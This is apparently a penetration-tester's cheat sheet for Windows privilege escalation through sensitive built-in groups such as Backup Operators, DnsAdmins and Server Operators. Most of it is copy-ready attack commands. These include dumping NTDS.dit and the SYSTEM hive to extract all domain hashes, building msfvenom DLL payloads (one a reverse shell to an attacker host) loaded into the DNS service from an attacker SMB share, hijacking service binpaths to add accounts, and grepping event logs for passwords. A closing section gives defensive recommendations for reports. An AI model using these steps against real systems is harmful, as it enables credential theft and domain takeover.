🛡️ Methodology Checklist
- Check group membership:
whoami /groups -
Backup Operators→ SeBackupPrivilegeCmdLets or diskshadow VSS → dump SAM/NTDS -
DnsAdmins→dnscmd /serverlevelplugindll→ reconnect for elevated token (TOKEN TRAP) -
Event Log Readers→wevtutil qe Security /c:1000 /rd:true /f:text | findstr /i "pass" -
Server Operators→sc config [svc] binpath= "[payload]"→ restart service -
Print Operators→ SeLoadDriverPrivilege → load vulnerable driver
🎯 Operational Context
Use when: User is member of Backup Operators, Server Operators, DnsAdmins, Print Operators, or other sensitive Windows groups — each has a specific escalation path.
Think Dumber First: whoami /groups — look for Backup Operators, Server Operators, DnsAdmins, Event Log Readers, Print Operators. DnsAdmins = DLL injection into DNS service = SYSTEM. Backup Operators = read NTDS.dit via VSS = all domain hashes.
Skip when: User is only in standard Domain Users and local Users — no group-based escalation.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
whoami /groups | Check group memberships |
net localgroup "Backup Operators" | Confirm Backup Operators membership |
Import-Module .\SeBackupPrivilegeUtils.dll | Load SeBackupPrivilege helper DLL |
Copy-FileSeBackupPrivilege C:\Windows\NTDS\ntds.dit C:\temp\ntds.dit | Copy NTDS.dit using backup privilege |
robocopy /B C:\Windows\NTDS\ C:\temp\ ntds.dit | Alternative NTDS copy using backup flag |
diskshadow /s C:\temp\diskshadow.dsc | Create VSS shadow copy of C: to extract NTDS.dit |
reg save HKLM\SYSTEM C:\temp\SYSTEM | Save SYSTEM hive for NTDS.dit decryption |
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL | Extract all domain hashes from NTDS + SYSTEM |
dnscmd [DC_NAME] /config /serverlevelplugindll \\[LHOST]\share\evil.dll | DnsAdmins → load malicious DLL into DNS service |
sc.exe stop dns && sc.exe start dns | Restart DNS service to trigger malicious DLL load |
msfvenom -p windows/x64/exec cmd='net user [USER] [PASS] /add /domain' -f dll -o evil.dll | Create DLL payload for DnsAdmins attack |
net group "Event Log Readers" /domain | Check Event Log Readers group |
wevtutil qe Security /rd:true /f:text | findstr /i "pass" | Event Log Readers → search security log for passwords |
Get-WinEvent -LogName Security | where {$_.Message -like '*password*'} | PowerShell security log credential search |
🔬 Deep Dive & Workflow
Backup Operators → Domain Hash Dump
Method 1: SeBackupPrivilege DLL
# Load helpers
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
# Enable privilege
Set-SeBackupPrivilege
# Copy NTDS.dit (DC only — domain database)
Copy-FileSeBackupPrivilege C:\Windows\NTDS\ntds.dit C:\temp\ntds.dit -Overwrite
# Save SYSTEM hive (contains boot key for NTDS decryption)
reg save HKLM\SYSTEM C:\temp\SYSTEMMethod 2: diskshadow (Volume Shadow Copy)
# Create script file
cat > C:\temp\diskshadow.dsc << 'EOF'
set verbose on
set metadata C:\temp\meta.cab
set context clientaccessible
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
EOF
diskshadow /s C:\temp\diskshadow.dsc
# → Exposes shadow copy as E: drive
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\temp\ntds.dit -Overwrite
reg save HKLM\SYSTEM C:\temp\SYSTEMExtraction (on attacker):
# Transfer ntds.dit and SYSTEM to Kali
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
# → Dumps all NTLM hashes for all domain accounts
# → Pass-the-Hash with admin hash → Domain takeoverDnsAdmins → SYSTEM on DC
CRITICAL TOKEN TRAP: After loading the DLL, you need to reconnect your session. The elevated token only applies to NEW connections — your current shell still has the old token.
# Step 1: Generate DLL payload (on attacker)
msfvenom -p windows/x64/exec cmd='net user [USER] [PASS] /add /domain' -f dll -o evil.dll
# Or reverse shell DLL:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f dll -o evil.dll
# Step 2: Host DLL on SMB share
impacket-smbserver share . -smb2support
# Step 3: DnsAdmins member configures DNS plugin DLL
dnscmd [DC_HOSTNAME] /config /serverlevelplugindll \\[LHOST]\share\evil.dll
# Step 4: Restart DNS (requires DnsAdmins membership)
sc.exe stop dns
sc.exe start dns
# → DNS service runs as SYSTEM → loads our DLL → payload executes as SYSTEM
# TOKEN TRAP FIX: Don't use current shell for post-exploitation
# If payload added user → log in fresh → new session has correct tokenCleanup:
# Remove malicious DLL config after exploitation
sc.exe stop dns
reg delete HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll /f
sc.exe start dnsEvent Log Readers → Credential Hunt
# Search for PowerShell commands with passwords (logged in Security Event 4688/4104)
wevtutil qe Security /rd:true /f:text | findstr /i "pass"
wevtutil qe Microsoft-Windows-PowerShell/Operational /rd:true /f:text | findstr /i "pass"
# PowerShell equivalent
Get-WinEvent -LogName Security | Where-Object {$_.Message -like '*password*'} | Select -ExpandProperty MessagePrint Operators → SeLoadDriverPrivilege → SYSTEM
# Print Operators get SeLoadDriverPrivilege
# → Load a malicious kernel driver (Capcom.sys or similar)
# → Requires: EnableSeLoadDriverPrivilege.cpp PoC + Capcom IOCTL exploit
# High complexity — prefer other vectors if availableServer Operators → Service Manipulation
# Server Operators can start/stop services and modify some service configs
# Target: modify binpath of a service running as SYSTEM
sc.exe qc [SERVICE_NAME] # check current config
sc.exe config [SERVICE_NAME] binpath= "cmd.exe /c net user [USER] [PASS] /add"
sc.exe stop [SERVICE_NAME]
sc.exe start [SERVICE_NAME]
# → cmd runs as SYSTEM → adds user
# Restore (or service crashes are fine for CTF)
sc.exe config [SERVICE_NAME] binpath= "C:\original\path.exe"🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| DnsAdmins DLL injection fails | Need DNS service restart | Inject DLL: dnscmd /config /serverlevelplugindll \\[LHOST]\share\dns.dll; requires DNS restart via Server Operator or admin |
| Backup Operators VSS access blocked | Privilege not fully activated | Token may need activation; use SeBackupPrivilege PowerShell module to activate token |
| Print Operators shell fails | Modern Windows mitigated | Print Operators loading DLL into spooler is largely mitigated post-CVE-2021-1675; try alternative |
| Event Log Readers interesting but not privesc | Read-only log access | Use for credential hunting in event logs: wevtutil qe Security /f:text | findstr /i password |
| Server Operators service modify fails | UAC or protected service | Try: sc config [SVC] binpath= "cmd.exe /c net user admin Pass@123 /add"; restart service |
📝 Reporting Trigger
Finding Title: Privileged Group Membership Enables Windows Privilege Escalation Impact: Membership in DnsAdmins, Backup Operators, or Server Operators provides indirect but equivalent-to-admin access through DLL injection into DNS, VSS access to credential databases, or service binary modification. Root Cause: Users added to privileged Windows groups for operational convenience without security review of the implied escalation paths. Recommendation: Treat DnsAdmins, Backup Operators, Print Operators, and Server Operators as Tier 0 sensitive groups. Audit and remove unnecessary memberships. Implement JIT access for privileged group membership. Alert on sensitive group membership changes via Windows Event ID 4728.